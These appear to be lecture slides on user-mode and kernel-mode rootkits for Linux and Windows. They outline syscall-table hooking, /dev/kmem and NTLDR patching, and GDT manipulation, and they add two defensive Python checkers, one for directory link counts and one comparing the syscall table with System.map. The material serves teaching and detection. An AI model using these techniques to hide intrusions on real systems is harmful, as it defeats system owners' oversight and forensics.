   The attacker must have the Debug Programs right on the system (or own the target process).
   The attacker uses DLL injection to modify a running DLL that displays information on the screen.
     The modified DLL still calls the original DLL, but does not display all the data.
Windows User Mode Rootkits
 AFX Windows RootKit
   The attacker uses the AFX Windows Rootkit configuration console to generate code on his machine, then executes it on the victim's machine.
   AFX WinRK
     Installs itself in the System32 directory.
     Creates iexplore.dll and explorer.dll.
     Injects explorer.dll and iexplore.dll into explorer.exe, the process that displays the GUI to users.
     Hides network connections, files, ...
Rootkit Defenses
 Preventing rootkits
   Harden systems and apply patches.
 Detecting rootkits
   File integrity checking (signatures)
 Rootkit identification
   Look for the specific changes made by most rootkits.
   chkrootkit for Unix
Kernel Mode Rootkits
 Kernel functions
   Process and thread management
   Interprocess communication
   Memory
   File system
   Hardware
   Interrupts
Kernel Mode Rootkits
 The kernel relies on hardware-level protection:
   Ring 0 vs. ring 3 on Intel CPUs.
   Prevents user processes from accessing critical kernel data structures.
Kernel Mode Rootkit
 Processes running in kernel mode belong to the kernel.
 Administrator and root only invoke user mode processes.
   These processes access the kernel through system calls.
   A change in the kernel changes the behavior of all processes.
Kernel Mode Rootkit
 Kernel mode rootkit capabilities:
   File and directory hiding
   Process hiding
   Network port hiding
   Promiscuous mode hiding
   Execution redirection
   Device interception and control
Kernel Mode Rootkit
 Advantages over user level rootkits:
   Affects all programs that try to discover something from the kernel.
   Statically linked binary forensic tools no longer help, since they still depend on the kernel's answers.
Linux Kernel
 Get a laptop and try it out!
Linux Kernel
 Linux allows us to look at many internal kernel structures through /proc ("slash proc"):
   Virtual directory, lives only in memory.
   Lots of commands just grab their info from /proc.
   We can write to certain areas of /proc, such as /proc/sys.
Linux Kernel
 /proc
   /proc/cpuinfo
   /proc/devices
   /proc/kmsg
     Log messages from the kernel
   /proc/ksyms
     List of all variables and functions exported to loadable kernel modules on the machine (2.4 kernels; /proc/kallsyms in 2.6)
   /proc/net
   /proc/stat
     Statistics such as data about CPU, virtual memory, hard drive usage
   /proc/sys
     Kernel variables.
   /proc/version
Linux Kernel
 /dev
   Contains device nodes for the various devices.
   /dev/kmem
     Image of the running kernel's virtual memory
   /dev/mem
     Image of all physical memory
     Gibberish without special tools
Linux Kernel
 User mode processes use system calls to access the kernel.
 Wrapped by the system libraries:
   SYS_open
   SYS_read
   SYS_write
   SYS_execve
   SYS_setuid
   SYS_get_kernel_syms
   SYS_query_module
 The numbers are defined in
   /usr/include/sys/syscall.h
   /usr/include/bits/syscall.h
   /usr/include/asm/unistd.h
   or similar locations.
Linux Kernel
 System call table:
   Array maintained by the kernel that maps system call numbers to the addresses of the kernel functions implementing them.
   Lives in kernel memory; its address and the addresses of the sys_* functions are listed on the hard drive in System.map:
     "less /boot/System.map"
   Use strace to find the system calls made by a command:
     "strace ls"
Linux Kernel Manipulations
 Loadable kernel modules
   Legitimate Linux / Solaris kernel feature:
     Add support for new hardware.
     Replace existing kernel features without a system reboot.
 The attacker uses insmod to load a kernel module that alters the system call table.
Linux Kernel Manipulations
 An evil kernel module alters SYS_execve so that it looks at the program being executed:
   If the program is one the attacker wants to redirect, the module actually executes another program instead.
   The attacker can wrap the true SYS_execve code, which makes it easy to generate the altered version.
   This alteration defeats file integrity checking tools:
     The true login, sshd, ... binaries on disk are unchanged and hash correctly.
     The true SYS_execve code is still there, but it is either never called or called only when it does not interfere with the attacker (if wrapped).
     The true login, the true sshd, ... are never run; the replacements are.
Linux Kernel Manipulations
 Loadable kernel modules do not survive a system reboot.
   The attacker alters programs in the boot process, e.g. init, to reload the module.
   Once inserted, the loadable kernel module hides the changes to the altered boot process.
Linux Kernel Manipulations
 Mighty Adore
   Loadable kernel module with the Ava user-space interface.
 Kernel Intrusion System (KIS)
   Comes with a slick GUI.
Linux Kernel Manipulations
 Alternative to loadable kernel modules: use /dev/kmem
   Attackers can use tools that read and write the kernel memory image.
   The attacker can insert alternative code for system calls.
   The attacker can change the system call table.
 Patching the kernel image file
   Simplest way: the attacker "patches" the vmlinuz file, which contains the kernel image.
Linux Kernel Manipulations
 User Mode Linux (UML)
   UML at user-mode-linux.sourceforge.net
   Runs an entire Linux kernel inside a normal user-mode process.
   Like VMware, creates a virtual environment.
   Sysadmins and users are running inside this virtual environment.
 Kernel Mode Linux (KML) project
   Allows certain user processes to run in kernel mode.
   The attacker patches the kernel with KML and now has processes that run in kernel mode.
   Those processes write to the system call table and the system call code.
Defending the Linux Kernel
 Prevention
   Deny superuser access to attackers.
   Patch quickly.
   Build a kernel that no longer allows loadable kernel modules.
     Red Hat 8.0, Red Hat 9.0, Linux 2.5.41
   Install Systrace to track and limit system calls.
   Use a Linux Security Module in your kernel.
Defending the Linux Kernel
 Kernel mode rootkit detection
   Look for suspicious network activity.
   File integrity checkers (to catch the not quite good enough hacker).
   chkrootkit
     Looks for system anomalies.
     Each directory has a link count. It should equal the number of subdirectories + 2 ("." plus the entry in the parent, plus one ".." link per subdirectory). A rootkit that hides a subdirectory from directory listings cannot hide its ".." link, so the count comes out too high.
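The link-count anomaly check, written out as an added example (not chkrootkit's code). The verdict logic is pure so it can be exercised on numbers alone; `check_tree` applies it to a real directory tree using only what the (possibly lying) kernel reports, and `demo_clean_tree` builds a small tree in a temporary directory. The caveat a practitioner needs: some file systems (btrfs, overlayfs) do not maintain directory link counts and report 1, so the check has to recognise that case rather than raise a false alarm.

```python
"""Directory link-count check of the kind chkrootkit performs (added example).

On Unix file systems that maintain link counts, a directory's st_nlink is
2 + number of subdirectories: ".", the parent's entry, and one ".." from
each child. A hidden subdirectory still contributes its "..".
"""
import os
import tempfile
from typing import Dict

def analyze(st_nlink: int, visible_subdirs: int) -> str:
    """Verdict from the link count and the number of subdirectories listed."""
    if st_nlink < 2:
        return "unsupported"        # btrfs/overlayfs report 1 for directories
    expected = visible_subdirs + 2
    if st_nlink == expected:
        return "ok"
    if st_nlink > expected:
        return f"hidden: {st_nlink - expected} subdirectory(ies) not listed"
    return "fewer links than entries: inconsistent file system"

def check_tree(root: str) -> Dict[str, str]:
    """Walk `root` and return a verdict per directory (path relative to root)."""
    verdicts = {}
    for dirpath, dirnames, _ in os.walk(root):
        # Symlinks to directories show up in dirnames but own no ".." link.
        visible = sum(1 for d in dirnames
                      if not os.path.islink(os.path.join(dirpath, d)))
        verdicts[os.path.relpath(dirpath, root)] = analyze(
            os.stat(dirpath).st_nlink, visible)
    return verdicts

def demo_clean_tree() -> Dict[str, str]:
    """Constructed tree in a temp dir: every verdict should be ok, or
    unsupported on file systems that do not keep directory link counts."""
    with tempfile.TemporaryDirectory() as root:
        for sub in ("bin", "lib", "lib/modules", "etc"):
            os.makedirs(os.path.join(root, sub))
        open(os.path.join(root, "etc", "passwd"), "w").close()
        return check_tree(root)

if __name__ == "__main__":
    for path, verdict in demo_clean_tree().items():
        print(f"{path}: {verdict}")
    # What a hidden directory looks like: ls shows 3 children, stat says 6.
    print("simulated:", analyze(6, 3))
```

Run it from a trusted, statically linked Python (or from a boot CD against the mounted disk) to be sure the stat values themselves are not being filtered; a kernel rootkit that also patches stat() defeats this check, which is why the slide lists it as an anomaly detector rather than a proof.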
Defending the Linux Kernel
 Kernel mode rootkit detection
   Kernel Security Therapy Anti-Trolls (KSTAT, Linux 2.4)
     Looks for changes to the system call table.
     Scans /dev/kmem.
     Looks up the memory locations of the system calls and compares them with System.map.
     Creates fingerprints of system calls and various critical programs.
   Syscall Sentry
     Loadable kernel module.
     Checks for modules that alter the system call table.
     Alerts the system administrator in this case.
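The comparison KSTAT and Syscall Sentry perform, as an added example that is not their code: parse System.map, read the live table, and report every entry that no longer points at the symbol it should. Both inputs here are constructed text: a few System.map lines of the form the kernel build writes, and a table dump as a tool reading /dev/kmem (or a helper module) would return it, with the i386 2.4 syscall numbers for the calls shown. Two kinds of redirection are distinguished, because they point at different attacks from the slides: an address outside the kernel's text segment means a loadable module took over the call; an address inside the text segment that matches no symbol means code was patched into the running image (or the table rewritten through /dev/kmem).

```python
"""Compare the live system call table with System.map (added example).

SYSTEM_MAP and LIVE_TABLE are constructed; on a real 2.4 box they come from
/boot/System.map and from reading sys_call_table out of /dev/kmem.
"""
import re
from typing import Dict, List, Tuple

SYSTEM_MAP = """\
c0100000 T _text
c0106a40 T sys_open
c0106b10 T sys_read
c0106c20 T sys_write
c0107350 T sys_execve
c0108e00 T sys_setuid
c0109a20 T sys_getdents
c02c4000 D sys_call_table
c02d0000 A _etext
"""

# Live table as read from kernel memory: syscall number -> handler address.
LIVE_TABLE = {
    5: 0xC0106A40,     # sys_open, untouched
    3: 0xC0106B10,     # sys_read
    4: 0xC0106C20,     # sys_write
    11: 0xD0859000,    # sys_execve now points into module address space
    23: 0xC0108E00,    # sys_setuid
    141: 0xC02A1234,   # sys_getdents points at unnamed code inside the kernel
}
SYSCALL_NAMES = {5: "sys_open", 3: "sys_read", 4: "sys_write",
                 11: "sys_execve", 23: "sys_setuid", 141: "sys_getdents"}

def parse_system_map(text: str) -> Dict[str, int]:
    """Symbol name -> address from System.map lines 'addr type name'."""
    syms = {}
    for line in text.splitlines():
        m = re.match(r"^([0-9a-fA-F]+)\s+(\S)\s+(\S+)$", line.strip())
        if m:
            syms[m.group(3)] = int(m.group(1), 16)
    return syms

def audit(system_map: str, live: Dict[int, int],
          names: Dict[int, str]) -> List[Tuple[str, str]]:
    """(syscall name, finding) for every entry not pointing where it should."""
    syms = parse_system_map(system_map)
    lo, hi = syms["_text"], syms["_etext"]
    by_addr = {addr: name for name, addr in syms.items()}
    findings = []
    for number, addr in sorted(live.items()):
        name = names[number]
        expected = syms.get(name)
        if expected is None:
            findings.append((name, "no such symbol in System.map"))
        elif addr == expected:
            continue
        elif not lo <= addr < hi:
            findings.append((name, f"redirected to {addr:#010x}, outside kernel text "
                                   "(loadable module?)"))
        else:
            where = by_addr.get(addr, "unnamed code")
            findings.append((name, f"redirected to {addr:#010x} ({where}) inside kernel text"))
    return findings

if __name__ == "__main__":
    for name, finding in audit(SYSTEM_MAP, LIVE_TABLE, SYSCALL_NAMES):
        print(f"{name}: {finding}")
```

Keep the System.map used for comparison on read-only media: an attacker with root can edit the copy in /boot just as easily as the table in memory, and a tool that reads both from the compromised host proves nothing.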
Windows Kernel
 A user process calls a DLL. The DLL can:
   return to the user process,
   go to csrss.exe (the client/server runtime), or
   require a kernel function.
Windows Kernel
 A user process makes a call to ReadFile.
 The Win32 subsystem DLL makes a call to NtReadFile in Ntdll.dll.
   Ntdll.dll translates the well-documented API into rather obscure native calls (that can be easily changed).
 Ntdll.dll makes a call into the Executive.
   The Executive sits inside ntoskrnl.exe.
   It determines which piece of kernel code is needed to handle the request.
 The kernel code interacts with the hardware (disk) through the Hardware Abstraction Layer (HAL.dll).
Windows Kernel
 Ntdll.dll's call into the kernel is system service dispatching:
   Essentially a system call.
   Uses the System Service Dispatch Table (SSDT).
     The table indicates where the appropriate system service code is located within the kernel.
Windows Kernel: Tools
 Ctrl + Alt + Del: Task Manager process table
 Start -> Control Panel -> Administrative Tools -> Performance: click "+" and check Process
 Dependency Walker (www.dependencywalker.com)
 Process Explorer (http://www.sysinternals.com/ntw2k/freeware/procexp.shtml)
Manipulating the Windows Kernel
 Same basic strategies as in Linux:
   Evil device driver.
   Alter the running kernel in memory.
   Overwrite the kernel image on disk.
   Deploy the kernel on a virtual system.
   Run user-mode code at kernel level.
Manipulating the Windows Kernel
 Evil device driver
   Alters system service call handling by loading a device driver.
   Replaces or alters kernel functions.
   Needs administrator privileges.
   Needs to get the evil code to run:
     Overwrite existing kernel functionality.
     Alter the system service dispatch table to point to the new code.
     Alter the system service dispatcher.
Manipulating the Windows Kernel
 Altering a running kernel in memory:
   Windows uses the Global Descriptor Table (GDT) to manage memory segments.
     The GDT stores the division into segments and each segment's accessibility from ring 0 / ring 3.
   Unfortunately, an attacker who has reached ring 0 once can add a memory segment to the GDT.
     Greg Hoglund, Phrack 55, explains how to bypass the Security Monitor this way.
     Add a memory segment from location 0x00000000 to 0xffffffff that is accessible from ring 3.
     This gives all user processes access to all of memory!
   Manipulate the \Device\PhysicalMemory object.
     Use PhysMem from sysinternals.com.
     The attacker can now change system functionality.
Manipulating the Windows Kernel
 Patching the kernel on the hard drive
   The system boot checks the integrity of Ntoskrnl.exe.
     Thus it is not possible to change only the kernel file.
     One has to change both the integrity checker and the kernel.
     The integrity checker sits in NTLDR: change one instruction to jump over the integrity check.
   First patch NTLDR to disable the integrity check.
   Then patch Ntoskrnl.exe to disable the security access check.
   Now introduce the rootkit.
Manipulating the Windows Kernel
 Create a fake system using a virtual machine.
   Variety of virtual machines: VMware, Plex86, Virtual PC, Bochs
   But the start-up message needs to be hidden; unlike on Linux, that is difficult.
Protecting the Windows Kernel
 Prevent access to the machine.
 Detect a rootkit:
   Antivirus tools recognize most rootkit files before installation.
   Some rootkits can be spotted afterwards, because their developers were careless.
   File integrity checkers.
 Removing rootkits
   Analyze the system without invoking its kernel.
   Use a FIRE or Knoppix bootable CD-ROM and look at the hard drive: registry / file system.
Next Generation Malware
 BIOS
   Malware active before booting from a device.
   Bioscentral website for tools to look at the BIOS.
 Microkernel